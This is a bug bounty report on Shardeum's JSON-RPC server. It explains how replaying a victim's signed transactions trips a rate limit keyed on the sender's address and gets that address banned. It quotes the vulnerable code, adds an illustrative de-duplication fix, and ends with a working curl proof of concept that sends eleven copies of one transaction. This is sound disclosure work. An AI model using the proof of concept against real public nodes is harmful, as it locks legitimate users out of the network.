Submitted on Feb 3rd 2025 at 16:08:02 UTC by @anton_quantish for Audit Comp | Shardeum: Ancillaries III
Report Type: Websites and Applications
Target: https://github.com/shardeum/json-rpc-server/tree/itn4
Impacts:
Temporarily disabling user to access target site, such as:
Locking up the victim from login
Description
Brief/Intro
It's possible to get a victim's account address blocked so that the victim can no longer send any transaction via JSON-RPC.
Vulnerability Details
When a JSON-RPC request comes in, it first passes through the rateLimit.ts middleware, then every method call is checked by the checkRequest(ip, request) function, and finally the rate limits are checked in the utils.ts:isRequestOkay function.
When the method being executed is eth_sendRawTransaction, one of the checks is how often the tx sender (the account address in the tx's from field) calls this method. If it is called too often (more than 10 calls per minute in the default config), the request is cancelled and the sender is marked as abused:
https://github.com/shardeum/json-rpc-server/blob/aba70af9ae65b59034c87ced1253a7478a2a0293/src/utils.ts#L1097-L1109
// fromAddressHistory holds the send timestamps recorded for the tx's `from` address;
// 10 sends within one minute trip the limit regardless of who submitted the requests
if (config.rateLimit && config.rateLimitOption.limitFromAddress) {
  if (fromAddressHistory && fromAddressHistory.length >= 10) {
    if (now - fromAddressHistory[fromAddressHistory.length - 10] < oneMinute) {
      if (verbose) console.log(`Your address ${readableTx.from} injected 10 txs within 60s`)
      if (config.recordTxStatus)
        createRejectTxStatus(
          bufferToHex(transaction?.hash() as Buffer),
          'Rejected by JSON RPC rate limiting',
          ip
        )
      // the sender is recorded as abusive keyed by its `from` address, not by the submitting IP
      this.addAbusedAddress(readableTx.to, readableTx.from as string, ip)
      this.addAbusedSender((readableTx.from as string).toLowerCase())
      return false // isRequestOkay return value, so the request is cancelled
    }
  }
}
Moreover, every 2 minutes (by default) the top 10 most abusive senders are blacklisted, so they are permanently blocked from sending transactions (in the checkAndBanSpammers function):
https://github.com/shardeum/json-rpc-server/blob/aba70af9ae65b59034c87ced1253a7478a2a0293/src/utils.ts#L823-L836
// sort the recorded abusive senders by how many times they tripped the rate limit
const mostAbusedSendersSorted: { address: string; count: number }[] = Object.values(
  this.abusedSenders
).sort(
  (a: { address: string; count: number }, b: { address: string; count: number }) => b.count - a.count
)
console.log('Top 10 spammer addresses: ', mostAbusedSendersSorted.slice(0, 10))
for (const spammerInfo of mostAbusedSendersSorted) {
  // any sender above allowedTxRate is blacklisted permanently
  if (spammerInfo.count > allowedTxRate && config.rateLimit && config.rateLimitOption.banSpammerAddress) {
    this.addSenderToBacklist(spammerInfo.address)
    console.log(
      `Caller ${spammerInfo.address} is added to spammer list due to sending more than ${allowedTxRate} txs within 5 min.`
    )
  }
}
The attack is that an attacker can re-send a victim's already-broadcast signed transactions to this endpoint: the rate limit is keyed only by the tx's from address, so the victim's account address gets banned and the victim can no longer submit their own transactions.
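As an added illustration (not code from the json-rpc-server project), the check below keys the per-sender window on distinct transaction hashes instead of raw call counts, so a batch of replayed copies of one signed tx can no longer push the victim over the limit; the limit and window mirror the report's defaults, and txHash is assumed to be already derived from the raw tx by the caller.

```typescript
// Constructed example: a from-address rate limiter that is robust to replayed txs.
// A replay of a hash already seen in the window is dropped as a duplicate but is
// never counted against the sender, so only genuinely new txs can trigger abuse.
type Verdict = { ok: boolean; reason?: string }

class SenderRateLimiter {
  // sender (lowercased from address) -> accepted txs in the sliding window
  private history = new Map<string, { hash: string; at: number }[]>()
  // sender -> number of times the limit was tripped (what a ban list would consume)
  private abusedSenders = new Map<string, number>()

  constructor(private readonly limit = 10, private readonly windowMs = 60000) {}

  // `now` is injected (ms) so the window behaviour is deterministic and testable
  check(from: string, txHash: string, now: number): Verdict {
    const sender = from.toLowerCase()
    const entries = (this.history.get(sender) ?? []).filter((e) => now - e.at < this.windowMs)
    this.history.set(sender, entries)

    if (entries.some((e) => e.hash === txHash)) {
      // Same signed tx again: nothing new to forward, and not the sender's doing.
      return { ok: false, reason: 'duplicate transaction in window' }
    }
    if (entries.length >= this.limit) {
      // Only distinct txs reach this point, so the abuse counter reflects real volume.
      this.abusedSenders.set(sender, (this.abusedSenders.get(sender) ?? 0) + 1)
      return { ok: false, reason: 'rate limited' }
    }
    entries.push({ hash: txHash, at: now })
    return { ok: true }
  }

  abuseCount(from: string): number {
    return this.abusedSenders.get(from.toLowerCase()) ?? 0
  }
}

// Replays `copies` identical submissions of one tx hash and reports how many passed.
function replayBatch(limiter: SenderRateLimiter, from: string, txHash: string, copies: number, now: number): number {
  let accepted = 0
  for (let i = 0; i < copies; i++) if (limiter.check(from, txHash, now).ok) accepted++
  return accepted
}
```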
Impact Details
The victim is no longer able to send transactions via JSON-RPC.
It is also possible to get the victim's address banned on every public JSON-RPC server, since the attack requires just a single request per JSON-RPC server. This blocks the victim from using the Shardeum network at all.
Proof of Concept
While the JSON-RPC server is running, take any raw tx previously sent by the victim and make the following request with curl:
curl http://172.16.205.128:8080 -XPOST -H 'Content-Type: application/json' --data '[{"jsonrpc":"2.0","method":"eth_sendRawTransaction","params":["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"]},{"jsonrpc":"2.0","method":"eth_sendRawTransaction","params":["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"]},{"jsonrpc":"2.0","method":"eth_sendRawTransaction","params":["0xf9018a1c84ee6b28008303d090948d12a197cb00d4747a1fe03395095ce2a5cc681980b90124278b8c0e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000013fbe85edc90000000000000000000000000000e7775a6e9bcf904eb39da2b68c5efb4f9360e08c000000000000000000000000000000000000000000000000000000000098968000000000000000000000000000000000000000000000000000000000003d2fdf00000000000000000000000000000000000000000000000000000000c40dfee0000000000000000000000000000000000000000000000000000000000000001bcfa3d02680fc6dadebd9a0ddbeb8bae1cf8fa482ee644b9557f5b0e3d0cf7324778545ad5169922eba09be80d686e6b15dce97391b4d5df961eeb96dc776d0cc1ca0b545f1f289d59de39fc0a3f8c64b4dd7a1f88fa3dee233b865869732501fa956a00bfae290c925cc0a2a7301139b1739d809d037963106c0378a9be4abebb85d6d"]},{"jsonrpc":"2.0","method":"eth_sendRawTransaction","params":["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"]},{"jsonrpc":"2.0","method":"eth_sendRawTransaction","params":["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"]},{"jsonrpc":"2.0","method":"eth_sendRawTransaction","params":["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"]},{"jsonrpc":"2.0","method":"eth_sendRawTransaction","params":["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"]},{"jsonrpc":"2.0","method":"eth_sendRawTransaction","params":["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"]},{"jsonrpc":"2.0","method":"eth_sendRawTransaction","params":["0xf9018a1c84ee6b28008303d090948d12a197cb00d4747a1fe03395095ce2a5cc681980b90124278b8c0e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000013fbe85edc90000000000000000000000000000e7775a6e9bcf904eb39da2b68c5efb4f9360e08c000000000000000000000000000000000000000000000000000000000098968000000000000000000000000000000000000000000000000000000000003d2fdf00000000000000000000000000000000000000000000000000000000c40dfee0000000000000000000000000000000000000000000000000000000000000001bcfa3d02680fc6dadebd9a0ddbeb8bae1cf8fa482ee644b9557f5b0e3d0cf7324778545ad5169922eba09be80d686e6b15dce97391b4d5df961eeb96dc776d0cc1ca0b545f1f289d59de39fc0a3f8c64b4dd7a1f88fa3dee233b865869732501fa956a00bfae290c925cc0a2a7301139b1739d809d037963106c0378a9be4abebb85d6d"]},{"jsonrpc":"2.0","method":"eth_sendRawTransaction","params":["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"]},{"jsonrpc":"2.0","method":"eth_sendRawTransaction","params":["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"]}]'
The batch contains 11 copies of the same transaction. This single request is all that is needed to get the sender address banned. You will see the following in the JSON-RPC server log:
adding abused sender 0x7f39a55849ff447813557946fe387861784aadca
Then, if you try to send any other transaction from the victim's address, it is soft-rejected with:
Network is currently busy. Please try again later.